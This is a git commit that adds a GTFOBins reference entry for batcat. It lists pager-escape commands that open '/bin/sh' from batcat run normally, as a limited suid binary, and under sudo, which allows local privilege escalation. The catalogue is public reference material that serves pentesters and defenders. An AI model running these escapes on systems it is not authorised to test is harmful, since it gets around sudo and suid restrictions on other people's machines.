Add batcat

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
master
oush4ck 2022-12-28 21:44:31 +01:00 committed by GitHub
parent 95bb7291a4
commit f4e71b63cb
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 16 additions and 0 deletions

16
_gtfobins/batcat.md Normal file
View File

@ -0,0 +1,16 @@
---
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. `--paging always` can be omitted provided that the output doesn't fit the screen.
functions:
shell:
- code: |
batcat --paging always /etc/profile
!/bin/sh
suid-limited:
- code: |
./batcat --paging always /etc/profile
!/bin/sh
sudo:
- code: |
sudo batcat --paging always /etc/profile
!/bin/sh
---